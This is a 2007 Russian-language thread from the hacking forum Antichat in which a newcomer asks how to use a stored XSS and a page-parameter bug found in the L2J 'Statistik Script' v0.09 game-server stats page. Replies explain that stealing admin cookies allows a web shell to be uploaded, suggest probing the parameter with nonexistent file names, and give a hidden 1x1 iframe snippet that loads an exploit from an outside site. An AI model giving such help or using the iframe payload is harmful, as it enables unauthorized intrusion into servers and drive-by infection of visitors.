Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
24.02.2007, 00:12
|
|
Новичок
Регистрация: 23.02.2007
Сообщений: 17
Провел на форуме:
47805
Репутация:
5
|
|
Активные Xss
Люди ... подскажите, вот нашел я активную XSS на L2J 'Statistik Script' v0.09, как мне ее заюзать, а лучше где можно почитать побольше инфы про активные XSS ... (есть сплоит для этого движка вроде, но как его впарить - хз) ...
|
|
|
24.02.2007, 00:33
|
|
Участник форума
Регистрация: 14.01.2006
Сообщений: 242
Провел на форуме:
2630617
Репутация:
245
|
|
http://forum.antichat.ru/showthread.php?t=20140
|
|
|
|
24.02.2007, 00:53
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Забавно, человек нашёл активную ксс, но не умеет её юзать=]]
|
|
|
|
24.02.2007, 00:56
|
|
Постоянный
Регистрация: 31.12.2005
Сообщений: 605
Провел на форуме:
4349433
Репутация:
661
|
|
загадка природы =\
|
|
|
|
24.02.2007, 01:50
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
A110ut, мб ошибка?  шучу)
зы оффтоп) |
|
|
|
24.02.2007, 12:27
|
|
Новичок
Регистрация: 23.02.2007
Сообщений: 17
Провел на форуме:
47805
Репутация:
5
|
|
ЖЖоте  ...Как я понял, с помощью XSS можно спереть только куки, так? С их помощью нельзя например залить шел на сервак? + в это движке есть уязвимость http://***.**.**/?page=index.php? -->все тормозить начинает и страницу бажит ... Что я могу с ее помощью сделать? (если вы конечно понимаете про что я =) ... |
|
|
|
24.02.2007, 12:37
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Как я понял, с помощью XSS можно спереть только куки, так? С их помощью нельзя например залить шел на сервак?
Если это куки админа какого нибудь нормального сайта (в данном случае имеется в виду админа не сайта стоящего на беспл. хостинге, т.к. там чаще всего запрещён пхп) то шелл залить можно спокойно через админку.
+ в это движке есть уязвимость http://***.**.**/?page=index.php? -->все тормозить начинает и страницу бажит ...
Если идёт такой запрос, вместо index.php подставь test.php , или любое другое название, главное что бы файл отсутствовал на сервере. И посмотри на результат.
|
|
|
|
24.02.2007, 12:56
|
|
Новичок
Регистрация: 23.02.2007
Сообщений: 17
Провел на форуме:
47805
Репутация:
5
|
|
1) вот именно что сайт (скрипт) находится в LAN, и там я админку не нашел, хоть есть форма регистрации и авторизации, это стандартный игровой сервер ''Линейки''
2) пробывал разные и test.php и др., но бажит только при значении ?page=index.php? ... Видел даже сплоит для этого движка, но как им пользоваться -- хз  ... и в описании есть только типо используеться баг при помоще именно ?page=index.php? (этой страницы наверное не существует, хотя ..)
PS .. Использовать пассивную XSS не могу, т.к. там нету даже типо "почты" ... |
|
|
|
25.02.2007, 09:07
|
|
Новичок
Регистрация: 23.02.2007
Сообщений: 17
Провел на форуме:
47805
Репутация:
5
|
|
Дык кто что может посоветовать по этому поводу, движок L2J 'Statistik Script' v0.09, сервер XPюша SP2, есть вот этот "баг" с параментром ?page= и страницей к нему index.php? ...
Как я понял это php-inj =) ...
Последний раз редактировалось -=kas@t1k=-; 25.02.2007 в 09:38..
|
|
|
|
25.02.2007, 13:21
|
|
Участник форума
Регистрация: 14.01.2006
Сообщений: 242
Провел на форуме:
2630617
Репутация:
245
|
|
ктоме активной хсс можно также если у тебя есть сплоит вписть такой код
Код:
<iframe src='САЙТ ГДЕ ЛЕЖЫТ ТВОЙ СПЛОИТ' width='1' height='1' style='visibility: hidden;'></iframe>
Но все нормальные сплоиты стоят деньги.. |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
